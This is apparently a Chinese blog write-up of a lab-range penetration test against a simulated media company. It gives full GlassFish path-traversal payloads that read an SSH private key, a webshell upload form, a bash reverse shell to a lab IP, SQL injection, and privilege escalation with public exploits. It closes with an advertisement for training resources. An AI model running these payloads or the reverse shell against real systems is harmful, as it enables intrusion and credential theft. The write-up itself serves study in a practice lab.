本文围绕靶场网络渗透测试展开,先通过Fscan、NMAP等工具进行信息收集与端口扫描,确定可攻击点。接着对多台主机进行渗透测试,获取权限并思考进一步利用。此外,还介绍了网络安全学习方法,包括报专业、自学、培训,以及零基础入门的三个阶段:基础准备、web渗透、进阶。
摘要
靶场模拟一家规模在一百人左右的数字传媒公司,公司总部在重庆,在成都设立一办事处。公司共计以下五个部门。在评估期间,在xhlab.com的网络上发现了几个令人担忧的漏洞。在执行攻击时,作者能够访问多台机器,这主要是由于过时的补丁和糟糕的安全配置。在测试期间,部分系统成功入侵,从而控制了网络中的部分系统。这些系统以及有关如何获得访问权限的简要说明在以下部分中列出。
受损机器概述如下
主机名
|
对应公网IP
|
对应内网IP
—|—|—
WEB01
|
10.10.80.2
|
10.50.10.8
蜜罐1
|
无
|
10.50.10.10
WEB02
|
10.10.80.3
|
10.50.10.5
WEB03
|
10.10.80.4
|
10.50.10.6
localhost.localdomain
|
10.10.80.9
|
192.168.254.2
MSSQL
|
无
|
192.168.200.20
DCXH
|
无
|
192.168.100.200
MAIL_USER
|
10.10.80.160
|
192.168.100.10
ITdevPC
|
无
|
192.168.100.11
由公示信息可得知公司共计五个部门:
1、传媒与设计部(MD dep)
2、行政部门(Admin dep)
3、销售部门(Sales dep)
4、财务部门(Finance dep)
5、信息技术服务部门(IT dep)
攻击的范围:
10.50.10.1-10,更多信息需要去靶场获取
本次攻击的团队服务器为10.10.80.155
本机的攻击地址:
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-xvtLARwn-1692154649184)(https://image.3001.net/images/20220918/1663436144_6326057018e06ae64a27d.png!small)]
在对于靶场进行内部渗透测试时,我将通过各种工具对目标进行信息收集并且扫描多台机器并尝试找到最容易实现的目标,获取其最高权限system/root。
代理开启情况统计:
协议
|
地址
|
端口
—|—|—
socks4a
|
10.10.80.2
|
8081
socks4a
|
192.168.200.20
|
56787
信息收集
1.Fscan进行c段端口扫描:
由于获取到的攻击外网范围是在10.10.80.1-10,所以并不明确详细的攻击范围,所以用fscan进行端口存活扫描所以通过nmap跟fscan扫描主机以及主机开启端口情况
使用fscan扫描c段后,发现可以对10.10.80.1-10的端口以及服务进一步扫描
2.NAMP扫描端口以及端口服务:
对于开启22端口的IP地址通过NMAP扫描出开启了OPENSSH服务,那么可能对应的主机可能会出现私钥泄露,弱口令,但是由于22是暴露于公网,所以存在弱口令的可能性不大,所以决定先从web入手
APACHE IIS
NGINX等服务对应的主机如果没有打补丁可以根据APACHE,IIS,NAINX中间件服务的版本去找一些漏洞,具体需要与主机信息进行结合
3.端口和应用整理:
从中我对于开放80,8080,443,8181,4848端口的IP地址进行访问,并对其进行了整理
其中,发现了以下几个认为可以入手的点,并将对其进行攻击
4.整体分析
a、对于10.10.80.2与10.10.80.9首先想到可能会出现注入,弱口令登陆等漏洞登陆的后台可能是利用CMS搭建,可以进一步的去探寻.
b、10.10.80.3是一个纯静态的页面,前端无法找到与后端交互,但是开启了SSH服务,可能需要扫描一下
c、10.10.80.4通过端口扫描发现了GLASSFISH服务,可以根据其版本去寻找可以利用的漏洞
d、10.10.80.8发现了一个OUTLOOK邮箱登陆的web页面,那么在靶场内可能会存在一些泄露的邮箱,可以根据泄露的邮箱账号密码进行钓鱼等攻击。
渗透测试
一、外部区域
1、10.10.80.4
根据上述的信息收集,我首先将开启GLASSFISH的主机作为首要目标,因为已获取到其版本信息,通过版本信息我找到了该版本的漏洞
glassfish4.1.2漏洞 任意文件读取(CVE-2017-1000028)
那么接下来就是根据漏洞指纹验证漏洞是否存在,如果存在就使用POC进行攻击
A、立足点
监听端口界面
证明漏洞存在,使用该漏洞的poc进行攻击
payload为
https://10.10.80.4:4848/theme/META-
INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/
成功读取到etc目录,之前信息收集的时候发现开启了SSH服务并且是一台Linux主机,于是想了以下私钥泄露,在Linux主机下面默认密钥存储位置是在用户的.ssh文件下面,用户是在Home目录下面
Payload为:
‘https://10.10.80.4:4848/theme/METAINF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/home/’
目录下面发现web03用户
所以继续翻找
Playlaod为‘https://10.10.80.4:4848/theme/META-
INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/home/web03’
web03目录下面发现了.ssh目录,继续翻找
Payload为‘https://10.10.80.4:4848/theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/home/web03/.ssh/id_rsa’
成功发现私钥,将私钥复制后,使用John进行密码爆破
先查找john位置:locate ssh2john
使用ssh2john.py将之前复制保存的私钥转换成john能够爆破识别的文件
/usr/share/john/ssh2john.py id_rsa >sshbao
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-vDxiqlll-1692154649209)(https://image.3001.net/images/20220918/1663505206_63271336e0f8642ea0f21.png!small)]
爆破结果密码为199801
之后通过远程管理工具Finalshell用密钥连接的方式进行连接,成功进入主机
该漏洞修复方法:升级版本
连上之后whoami查询到的用户为web03,所以下一步就是提权
B、主机信息收集:
主机操作系统版本
主机内核,系统信息
主机安装的程序有哪些
C、权限提升
在这之后使用提权辅助脚本工具(linux-exploit-
suggester)进行漏洞查找,将工具通过Finalshell(远程管理工具)传入主机内,传入的路径为/home/web03/linux-exploit-
suggester。
那么选择从年份最近的cve开始攻击,首先使用的是cve-2021-4034
Poc url: ‘https://github.com/arthepsy/CVE-2021-4034’
尝试后无果
接下来采用cve-2021-3156
POC文件url:
‘https://github.com/worawit/CVE-2021-3156/blob/main/exploit_userspec.py’
将文件复制下来之后,运行
查看ctc/passwd 发现已经对/etc/passwd文件进行了修改
切换到su账户,查看权限,获取root最高权限
该漏洞修复方法如下:对于自动分配的普通用户进行限制,包括网站使用的账户也要进行限制,SSH登陆做IP白名单限制,SUDU命令升级到最新版本。
D、进一步利用思考
获取权限后,发现10.50段,发现主机ping不通网关,也不能出网,接着翻找了主机内的文件,并没有发现什么有用的信息,所以放弃深入
主机二、10.10.80.9
A、立足点
web访问端口80页面后,首先想到注入,但是看到验证码就没有先去实际操作,利用dirsearch扫描一下网站目录,说不定会有一些目录有着重要的信息
用dirsearch扫描一下网站目录,说不定会有一些目录有着重要的信息,发现有一个install.php,直接访问
发现辰光客服系统,百度搜索了一下辰光CMS的漏洞,发现了一篇文章’https://www.bilibili.com/read/cv8198447/’
可以在本地写一个上传点,通过action参数去指定上传ip跟路径 去替换掉主机上面的,然后进行进行上传
代码如下
<from action="http://10.10.80.9/admin/event/uploadimg" method="post" enctype="multipart/from-data">
<label for="file">Filename:</label>
<input type="file" name="editormd-imag-file" id="editormd-image-file"/>
<br/>
<input type="submit" name="submit" value="Submit">
</from>
利用burp进行抓包之后修改后缀并传aspx木马
首次传马时右边并没有返回路径,那么可能是对上传的文件做了限制,接下来尝试绕过,
蚁剑连接成功
传入的路径:10.10.80.9/public/upload/files/1661965320.php
进入后,使用蚁剑插件查看基本信息,发现PHP版本为7.1.5
发现不能执行命令,因为是PHP,可能是由于disable_functions,禁用了,查看一下phpinfo
disable_functions是php.ini中的一个设置选项,可以用来设置PHP环境禁止使用某些函数,为了安全,运维人员会禁用PHP的一些“危险”函数,将其写在php.ini配置文件中,就是我们所说的disable_functions了disable_functions是一个黑名单机制,如果在渗透时已经上传了webshell却因为disable_functions导致我们无法进行命令执行,这时候就需要去进行
绕过,那么怎么去绕过disable_functions呢,蚁剑有一个插件:绕过disable_functios
执行命令成功:
为了进行下一步的提权,我们将在攻击机kali和webshell上分别执行如下
在webshell上执行
bash -i >& /dev/tcp/10.10.80.153/2555 0>&1
在攻击机kali上执行
nc -lvvp 2555
B、主机信息收集
查看主机操作系统版本:
查看主机内核、系统信息
查看主机安装的程序
C、权限提升
将工具通过蚁剑传入主机内,传入的路径为/www/wwwroot/10.10.80.9/public/upload/files/linux-exploit-
suggester.sh
通过辅助提权工具跑出来的结果,选择了cve-2016-5195(脏牛提权),在本地下载exp,gcc编译之后,通过蚁剑将文件上传上去,上传路径为:/www/wwwroot/10.10.80.9/public/upload/files/dirty/
成功,尝试使用ssh登录,获取主机root权限
D、进一步利用思考
成功获取root最高权限,获取权限后在webshell上面翻找到database.php文件,里面记录了数据库的用户名跟密码,尝试连接
连接成功
通过查找后,没有发现有用的信息
通过fscan扫描之后,虽然能出网,但无其他信息,无法深入
主机三、10.10.80.2
A、立足点
首先查看web页面,首先想到注入
‘union select user()发现存在注入
抓包,将抓到的内容,用Sqlmap跑一下
成功发现存在的5个数据库,并且发现数据库为mssql
在mssql中master,model,msdb,tempdb都是mssql自带的数据库,所以我们接着查db_data下面的表
发现下面有两个表,有个名字叫做logindb,说不定表里面有一些可以用来登陆的账户信息,继续查找表中的列
发现了email id userid userpwd4个列,那么接下来就是一个一个查找下面的数据了
查询完后,进行了整理
获取了到了邮箱密码后,突然想到之前发现的outlook登陆地址,于是联想到这些邮箱密码可以拿去钓鱼,或者使用xp_cmdshell进行getshell,尝试了很久的xp_cmdshell
无果,接着尝试使用dirsearch扫描了一下网站目录
发现有一个/upload文件,接着web去访问,但是需要401先验证,突然想到了刚刚注入得到的账户密码中有一个叫做upload,接着去使用upload尝试了一下
成功登陆后发现显示的是403,想了一下刚才的登陆,账户密码正确,如果不正确会提示继续输入,所以就算是403那么也能代表已经通过了验证,那么看看可能upload可能只是一个目录,他没有跳转的功能或许这个目录下面还有东西,接着使用dirsearch继续扫无任何输出,(在开发环境中,如果开发人员对开发目录具有一定规则,那么upload目录后面一般跟着upload.xxx;例如:upload.asp、upload.aspx等,于是访问upload/upload.aspx。
上传成功,直接连接目录下面的文件/upload/ma.aspx,由于是认证所以需要连接过程中需要添加header、Authorization才能正常连上webshell
蚁剑连接成功
B、主机信息收集
查看主机用户列表
查看主机管理员
查看进程列表,未发现杀毒程序。
查看操作系统版本信息
查看补丁列表
将systeminfo信息放在windows提权辅助网站(‘http://bugs.hacking8.com/tiquan/’)上,查
找漏洞
C、权限提升
首先由于系统是winserver2012 r2
再加上前面信息收集时发现的开启了IIS服务,首先想到了土豆系统的漏洞去进行提权,那么想到一个集成的工具LADON运用ladon下的potato模块去进行提权。
前往github“https://github.com/k8gege/Ladon”直接下载exe文件。
上传至C:\inetpub\wwwroot\upload文件夹中,直接运行ladon.exe sweetpotato 命令,提权成功。
提权成功之后将该主机上线到团队服务器cobalt strike简称cs
cs是一款GUI框架式的渗透测试工具,集成了很多功能最大的特点是可以团战,有一个服务器,多个客户端,每个客户端就是一个攻击者,攻击者通过连接到服务端来共享攻击资源和目标信息
上线成功
D、进一步利用思考
在C:/inetpub/wwwroot目录下面发现web.config.bak文件,打开之后发现应该是数据库的连接账户密码以及ip地址,根据配置文件描述使用的域用户dbadmin,于是在蚁剑内运行此账户密码进行连接数据库
连接成功后,发现里面的数据跟之前注入时一致
根据数据库的ip与拿到webshell的主机不同,通过数据库查询语句判断是否为站库分离
查看数据库主机名
查看web端主机名
通过exec xp_cmdshell "whoami"查询当前权限
查看一下MSSQL主机systeminfo信息
发现该主机处于域内,这里应该是突破到另一个区域关键点。
此主机开启了3389端口。
文件描述使用的域用户dbadmin,于是在蚁剑内运行此账户密码进行连接数据库
[外链图片转存中…(img-C5K4qJq3-1692154649302)]
[外链图片转存中…(img-KbS9sSNd-1692154649303)]
连接成功后,发现里面的数据跟之前注入时一致
[外链图片转存中…(img-zMVoF3H4-1692154649305)]
根据数据库的ip与拿到webshell的主机不同,通过数据库查询语句判断是否为站库分离
查看数据库主机名
[外链图片转存中…(img-aKAJjhW1-1692154649306)]
查看web端主机名
[外链图片转存中…(img-TNC0h87z-1692154649307)]
通过exec xp_cmdshell "whoami"查询当前权限
[外链图片转存中…(img-3fYTyryE-1692154649308)]
查看一下MSSQL主机systeminfo信息
[外链图片转存中…(img-D5IiVAU0-1692154649309)]
[外链图片转存中…(img-nPBdZ6JG-1692154649310)]
发现该主机处于域内,这里应该是突破到另一个区域关键点。
[外链图片转存中…(img-Zav1camO-1692154649312)]
此主机开启了3389端口。
学习网络安全技术的方法无非三种:
第一种是报网络安全专业,现在叫网络空间安全专业,主要专业课程:程序设计、计算机组成原理原理、数据结构、操作系统原理、数据库系统、 计算机网络、人工智能、自然语言处理、社会计算、网络安全法律法规、网络安全、内容安全、数字取证、机器学习,多媒体技术,信息检索、舆情分析等。
第二种是自学,就是在网上找资源、找教程,或者是想办法认识一-些大佬,抱紧大腿,不过这种方法很耗时间,而且学习没有规划,可能很长一段时间感觉自己没有进步,容易劝退。
如果你对网络安全入门感兴趣,那么你需要的话可以点击这里👉网络安全重磅福利:入门&进阶全套282G学习资源包免费分享!
第三种就是去找培训。
接下来,我会教你零基础入门快速入门上手网络安全。
网络安全入门到底是先学编程还是先学计算机基础?这是一个争议比较大的问题,有的人会建议先学编程,而有的人会建议先学计算机基础,其实这都是要学的。而且这些对学习网络安全来说非常重要。但是对于完全零基础的人来说又或者急于转行的人来说,学习编程或者计算机基础对他们来说都有一定的难度,并且花费时间太长。
第一阶段:基础准备 4周~6周
这个阶段是所有准备进入安全行业必学的部分,俗话说:基础不劳,地动山摇
第二阶段:web渗透
学习基础 时间:1周 ~ 2周:
① 了解基本概念:(SQL注入、XSS、上传、CSRF、一句话木马、等)为之后的WEB渗透测试打下基础。
② 查看一些论坛的一些Web渗透,学一学案例的思路,每一个站点都不一样,所以思路是主要的。
③ 学会提问的艺术,如果遇到不懂得要善于提问。
配置渗透环境 时间:3周 ~ 4周:
① 了解渗透测试常用的工具,例如(AWVS、SQLMAP、NMAP、BURP、中国菜刀等)。
② 下载这些工具无后门版本并且安装到计算机上。
③ 了解这些工具的使用场景,懂得基本的使用,推荐在Google上查找。
渗透实战操作 时间:约6周:
① 在网上搜索渗透实战案例,深入了解SQL注入、文件上传、解析漏洞等在实战中的使用。
② 自己搭建漏洞环境测试,推荐DWVA,SQLi-labs,Upload-labs,bWAPP。
③ 懂得渗透测试的阶段,每一个阶段需要做那些动作:例如PTES渗透测试执行标准。
④ 深入研究手工SQL注入,寻找绕过waf的方法,制作自己的脚本。
⑤ 研究文件上传的原理,如何进行截断、双重后缀欺骗(IIS、PHP)、解析漏洞利用(IIS、Nignix、Apache)等,参照:上传攻击框架。
⑥ 了解XSS形成原理和种类,在DWVA中进行实践,使用一个含有XSS漏洞的cms,安装安全狗等进行测试。
⑦ 了解一句话木马,并尝试编写过狗一句话。
⑧ 研究在Windows和Linux下的提升权限,Google关键词:提权
以上就是入门阶段
第三阶段:进阶
已经入门并且找到工作之后又该怎么进阶?详情看下图
给新手小白的入门建议:
新手入门学习最好还是从视频入手进行学习,视频的浅显易懂相比起晦涩的文字而言更容易吸收,这里我给大家准备了一套网络安全从入门到精通的视频学习资料包免费领取哦!
如果你对网络安全入门感兴趣,那么你需要的话可以点击这里👉网络安全重磅福利:入门&进阶全套282G学习资源包免费分享!
扫一扫
510
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
